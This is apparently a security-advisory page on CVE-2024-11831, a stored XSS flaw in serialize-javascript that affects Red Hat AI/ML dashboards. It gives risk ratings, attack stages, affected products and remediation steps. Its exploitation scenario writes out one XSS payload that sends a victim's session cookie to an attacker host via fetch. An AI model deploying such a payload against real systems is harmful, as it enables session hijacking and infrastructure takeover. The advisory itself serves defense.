AI Threat Alert

CVE-2024-11831: serialize-javascript: XSS via regex in AI/ML dashboards

MEDIUM
Published February 10, 2025
CISO Take

serialize-javascript fails to sanitize regex and certain JavaScript object types before serialization, allowing an authenticated attacker with low privileges to inject scripts that execute in any browser rendering that serialized output — a classic stored XSS path. The blast radius is meaningful: 2,959 downstream npm dependents and 12 prior CVEs in this same package signal a persistently under-hardened component now embedded in Red Hat AI/ML products, including Open Data Hub dashboards, ODH ML pipelines, OpenShift AI (Lightspeed), and Ansible Automation Platform Lightspeed. CVSS 5.4 and absence from CISA KEV moderate urgency, but the privileged user base — ML engineers and platform admins accessing these dashboards — means a successful session hijack translates directly into access to model registries, training infrastructure, and data pipelines. Apply the applicable Red Hat advisories (RHSA-2025:0381, RHSA-2025:1334, RHSA-2025:1468, and six others) and upgrade serialize-javascript to ≥6.0.2 in any internal webpack-bundled tooling.

Sources: NVD OpenSSF ATLAS Red Hat Security Advisories

What is the risk?

Medium risk overall, elevated in AI/ML platform contexts. Exploitation requires low privileges and user interaction (a victim must load a page rendering attacker-controlled serialized data), limiting opportunistic mass exploitation. However, the affected products include AI/ML control planes — Open Data Hub dashboard, OpenShift AI Lightspeed, ODH ML pipelines — where a compromised session grants access to model registries, training infrastructure, and pipeline configurations. The 12 historical CVEs in serialize-javascript and an OpenSSF Scorecard of 5.6/10 indicate weak upstream security hygiene, increasing likelihood of recurring issues. Organizations running Red Hat AI/ML stacks on OpenShift should treat this as P2 patching priority.

How does the attack unfold?

Malicious Input Injection
Attacker with low-privilege dashboard access (e.g., data scientist role) submits a regex or JS object containing an XSS payload into a field that will be serialized — such as a pipeline name, notebook config, or dataset label.
AML.T0049
Unsafe Serialization
serialize-javascript processes the input without proper sanitization, embedding the malicious regex or object directly into a server-rendered JavaScript bundle sent to other users' browsers.
AML.T0010.001
Browser-Side Code Execution
When a privileged user (ML admin, platform operator) loads the affected dashboard page, the injected payload executes silently in their browser context.
AML.T0078
AI Infrastructure Takeover
Exfiltrated session token is used to impersonate the victim account, granting the attacker access to model registries, training pipelines, and notebook environments to exfiltrate models or inject poisoned data.
AML.T0012

What systems are affected?

Package Ecosystem Vulnerable Range Patched
Jupyter Notebook pip No patch
13.2K OpenSSF 5.6 3.0K dependents Pushed 7d ago 60% patched ~454d to patch Full package profile →
Jupyter Notebook pip No patch
13.2K OpenSSF 5.6 3.0K dependents Pushed 7d ago 60% patched ~454d to patch Full package profile →
3scale-amp-system-container No patch
aap-cloud-ui-container No patch
advanced-cluster-security/rhacs-central-db-rhel8 No patch
advanced-cluster-security/rhacs-main-rhel8 No patch
advanced-cluster-security/rhacs-rhel8-operator No patch
advanced-cluster-security/rhacs-roxctl-rhel8 No patch
advanced-cluster-security/rhacs-scanner-v4-db-rhel8 No patch
advanced-cluster-security/rhacs-scanner-v4-rhel8 No patch
ansible-automation-platform-24/lightspeed-rhel8 No patch
automation-controller No patch
automation-eda-controller No patch
ceph No patch
devspaces/code-rhel8 No patch
devspaces/dashboard-rhel8 No patch
devspaces/traefik-rhel8 No patch
discovery-server-container No patch
dotnet6.0 No patch
dotnet7.0 No patch
dotnet8.0 No patch
grafana No patch
libarrow No patch
migration-toolkit-virtualization/mtv-console-plugin-rhel9 No patch
nodejs-compression-webpack-plugin No patch
nodejs-webpack No patch
odf4/ocs-client-console-rhel9 No patch
odf4/odf-console-rhel9 No patch
odf4/odf-multicluster-console-rhel9 No patch
odh-dashboard-container No patch
odh-dashboard-rhel8 No patch
odh-data-science-pipelines-argo-argoexec-rhel8 No patch
odh-data-science-pipelines-argo-workflowcontroller-rhel8 No patch
odh-ml-pipelines-api-server-v2-rhel8 No patch
odh-ml-pipelines-driver-rhel8 No patch
odh-ml-pipelines-launcher-rhel8 No patch
odh-ml-pipelines-persistenceagent-v2-rhel8 No patch
odh-ml-pipelines-scheduledworkflow-v2-rhel8 No patch
odh-model-registry-rhel8 No patch
odh-operator-container No patch
openshift-lightspeed-beta/lightspeed-console-plugin-rhel9 No patch
openshift-logging/kibana6-rhel8 No patch
openshift-pipelines/pipelines-console-plugin-rhel8 No patch
openshift-pipelines/pipelines-console-plugin-rhel9 No patch
openshift-pipelines/pipelines-hub-api-rhel8 No patch
openshift-pipelines/pipelines-hub-db-migration-rhel8 No patch
openshift-pipelines/pipelines-hub-ui-rhel8 No patch
openshift-service-mesh/kiali-ossmc-rhel8 No patch
openshift-service-mesh/kiali-rhel8 No patch
openshift3/ose-console No patch
openshift4/ose-monitoring-plugin-rhel9 No patch
pcs No patch
pybind No patch
quay/quay-rhel8 No patch
rh-dotnet60-dotnet No patch
rhacm2/console-rhel8 No patch
rhceph/rhceph-8-rhel9 No patch
rhceph/rhceph-9-rhel9 No patch
rhdh-hub-container No patch
rhosdt/jaeger-agent-rhel8 No patch
rhosdt/jaeger-all-in-one-rhel8 No patch
rhosdt/jaeger-collector-rhel8 No patch
rhosdt/jaeger-es-index-cleaner-rhel8 No patch
rhosdt/jaeger-es-rollover-rhel8 No patch
rhosdt/jaeger-ingester-rhel8 No patch
rhosdt/jaeger-query-rhel8 No patch
rhtpa/rhtpa-trustification-service-rhel9 No patch
serialize-javascript No patch

How severe is it?

CVSS 3.1
5.4 / 10
EPSS
N/A
Exploitation Status
No known exploitation
Sophistication
Trivial

What is the attack surface?

AV AC PR UI S C I A
AV Network
AC Low
PR Low
UI Required
S Changed
C Low
I Low
A None

What should I do?

5 steps

  1. Patch (Red Hat products): Apply RHSA-2025:0381, RHSA-2025:1334, RHSA-2025:1468, RHSA-2025:3870, RHSA-2025:4511, RHSA-2025:8059, RHSA-2025:10853, RHSA-2025:21068, RHSA-2025:21203 for all affected RHEL/OpenShift products.

  2. Upgrade in-house tooling: pin serialize-javascript to ≥6.0.2 in any npm/webpack project; run 'npm audit' or 'grype' to surface transitive inclusions.

  3. Harden dashboards: enforce a strict Content-Security-Policy (script-src 'self') on AI dashboard origins to block inline and cross-origin script execution as defense-in-depth.

  4. Detection: monitor WAF and CSP violation logs for unexpected script-src executions from AI dashboard origins; flag POST bodies containing regex literals or Function constructor patterns submitted to serialization endpoints.

  5. If patching is delayed: restrict access to affected dashboards to trusted networks via network policy or RBAC controls on OpenShift.

How is it classified?

Supply Chain Code Execution Data Extraction Framework Plugin AML.T0010.001 AML.T0012 AML.T0049 AML.T0078

Which compliance frameworks are affected?

This CVE is relevant to:

EU AI Act
Art. 15 - Accuracy, robustness and cybersecurity
ISO 42001
A.9.3 - AI system security
NIST AI RMF
MANAGE 2.2 - Mechanisms for identifying and managing AI risk are established
OWASP LLM Top 10
LLM03:2025 - Supply Chain Vulnerabilities

Frequently Asked Questions

What is CVE-2024-11831?

serialize-javascript fails to sanitize regex and certain JavaScript object types before serialization, allowing an authenticated attacker with low privileges to inject scripts that execute in any browser rendering that serialized output — a classic stored XSS path. The blast radius is meaningful: 2,959 downstream npm dependents and 12 prior CVEs in this same package signal a persistently under-hardened component now embedded in Red Hat AI/ML products, including Open Data Hub dashboards, ODH ML pipelines, OpenShift AI (Lightspeed), and Ansible Automation Platform Lightspeed. CVSS 5.4 and absence from CISA KEV moderate urgency, but the privileged user base — ML engineers and platform admins accessing these dashboards — means a successful session hijack translates directly into access to model registries, training infrastructure, and data pipelines. Apply the applicable Red Hat advisories (RHSA-2025:0381, RHSA-2025:1334, RHSA-2025:1468, and six others) and upgrade serialize-javascript to ≥6.0.2 in any internal webpack-bundled tooling.

Is CVE-2024-11831 actively exploited?

No confirmed active exploitation of CVE-2024-11831 has been reported, but organizations should still patch proactively.

How to fix CVE-2024-11831?

1. Patch (Red Hat products): Apply RHSA-2025:0381, RHSA-2025:1334, RHSA-2025:1468, RHSA-2025:3870, RHSA-2025:4511, RHSA-2025:8059, RHSA-2025:10853, RHSA-2025:21068, RHSA-2025:21203 for all affected RHEL/OpenShift products. 2. Upgrade in-house tooling: pin serialize-javascript to ≥6.0.2 in any npm/webpack project; run 'npm audit' or 'grype' to surface transitive inclusions. 3. Harden dashboards: enforce a strict Content-Security-Policy (script-src 'self') on AI dashboard origins to block inline and cross-origin script execution as defense-in-depth. 4. Detection: monitor WAF and CSP violation logs for unexpected script-src executions from AI dashboard origins; flag POST bodies containing regex literals or Function constructor patterns submitted to serialization endpoints. 5. If patching is delayed: restrict access to affected dashboards to trusted networks via network policy or RBAC controls on OpenShift.

What systems are affected by CVE-2024-11831?

This vulnerability affects the following AI/ML architecture patterns: ML dashboards and platform UIs, ML pipeline management interfaces, Model registry and serving control planes, AI-enabled DevOps and automation tooling, Notebook management platforms.

What is the CVSS score for CVE-2024-11831?

CVE-2024-11831 has a CVSS v3.1 base score of 5.4 (MEDIUM).

What is the AI security impact?

Affected AI Architectures

ML dashboards and platform UIsML pipeline management interfacesModel registry and serving control planesAI-enabled DevOps and automation toolingNotebook management platforms

MITRE ATLAS Techniques

AML.T0010.001 AI Software
AML.T0012 Valid Accounts
AML.T0049 Exploit Public-Facing Application
AML.T0078 Drive-by Compromise

Compliance Controls Affected

EU AI Act: Art. 15
ISO 42001: A.9.3
NIST AI RMF: MANAGE 2.2
OWASP LLM Top 10: LLM03:2025

What are the technical details?

Original Advisory

A flaw was found in npm-serialize-javascript. The vulnerability occurs because the serialize-javascript module does not properly sanitize certain inputs, such as regex or other JavaScript object types, allowing an attacker to inject malicious code. This code could be executed when deserialized by a web browser, causing Cross-site scripting (XSS) attacks. This issue is critical in environments where serialized data is sent to web clients, potentially compromising the security of the website or web application using this package.

Exploitation Scenario

A data scientist with standard dashboard access crafts a pipeline parameter or notebook configuration field containing a regex-wrapped XSS payload — for example, a project name set to /(<img src=x onerror='fetch("https://attacker.com/c?"+document.cookie)'>)/g. When serialize-javascript processes this value to embed it in a server-rendered page bundle, it fails to neutralize the embedded HTML. The next time an ML platform admin reviews pipeline configurations in the ODH dashboard, the payload executes in their browser, silently exfiltrating their session cookie to the attacker. Using that token, the adversary impersonates the admin, accesses the model registry, exfiltrates proprietary fine-tuned models, or injects poisoned dataset references into active training pipelines — all within the bounds of a legitimate authenticated session.

Weaknesses (CWE)

CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

CWE-79 — Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting'): The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.

  • [Architecture and Design] Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid [REF-1482]. Examples of libraries and frameworks that make it easier to generate properly encoded output include Microsoft's Anti-XSS library, the OWASP ESAPI Encoding module, and Apache Wicket.
  • [Implementation, Architecture and Design] Understand the context in which your data will be used and the encoding that will be expected. This is especially important when transmitting data between different components, or when generating outputs that can contain multiple encodings at the same time, such as web pages or multi-part mail messages. Study all expected communication protocols and data representations to determine the required encoding strategies. For any data that will be output to another web page, especially any data that was received from external inputs, use the appropriate encoding on all non-alphanumeric characters. Parts of the same output document may require different encodings, which will vary depending on whether the output is in the: etc. Note that HTML Entity Encoding is only appropriate for the HTML body. Consult the XSS Prevention Cheat Sheet [REF-724] for more details on the types of encoding and escaping that are needed. HTML body Element attributes (such as src="XYZ") URIs JavaScript sections Casca

Source: MITRE CWE corpus.

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

References

Timeline

Published
February 10, 2025
Last Modified
June 8, 2026
First Seen
June 12, 2026

Related Vulnerabilities

HIGH CVE-2026-42266 8.8

JupyterLab: Extension allow-list bypass enables privesc

Same package: notebook
HIGH CVE-2026-5422 8.1

jupyter-server: path traversal exposes sibling dir files

Same package: notebook
HIGH CVE-2018-8768 7.8

Jupyter Notebook: XSS via malicious .ipynb file

Same package: notebook
HIGH CVE-2026-35397 7.1

Jupyter Server: path traversal leaks sibling directories

Same package: notebook
MEDIUM CVE-2026-39378 6.5

nbconvert: path traversal exfiltrates files via HTML export

Same package: notebook
Back to Threat Feed